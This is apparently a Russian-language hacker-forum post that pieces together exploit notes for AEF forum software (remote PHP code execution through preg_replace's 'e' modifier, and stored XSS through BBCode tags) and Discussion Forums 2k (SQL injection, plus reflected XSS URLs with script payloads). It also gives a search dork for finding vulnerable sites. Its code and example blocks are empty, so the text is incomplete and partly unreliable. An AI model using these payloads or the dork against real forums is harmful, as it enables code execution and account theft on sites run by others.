Уязвимый код:



Уязвимость существует из-за небезопасного вызова функции "preg_replace()" с параметром "e". Удаленный пользователь может с помощью специально сформированного тега выполнить произвольный PHP код на целевой системе с привилегиям Web сервера.

Пример:

* - убрать конечно.

Решение: Установите последнюю версию 1.0.7 с сайта производителя.

Original link

Форум: Discussion Forums 2k
Версия: 3.3.T
Офф.сайт: http://developer.berlios.de/projects/df2k/

SQL Injection

XSS Passive

http://localhost/[installdir]/Category.php?id="><script>alert('xss')</script>&SubID=0

http://localhost/[installdir]/Messenger.php?act=Create&Sendto="><script>alert('x ss')</script>

(c) ~!Dok_tOR!~

Aef <= 1.0.7 Активные Xss
 

AEF <= 1.0.7 Активные XSS

Дорк: Powered By AEF 1.0.

Уязвимы сразу несколько тегов, т.к. проверка там везде однинаковая.
Поразительно тупую защиту от XSS:

обойти проще некуда - достаточно перекодировать скрипт:

Уязвимы теги: [url*], [ftp*], [email*].

Эксплуатация: при добавление сообщения, добавляем один из уязвимых тегов.

К примеру [url*]:

при переходе по ссылке выполнится скрипт.

Символ "*" - следует убрать.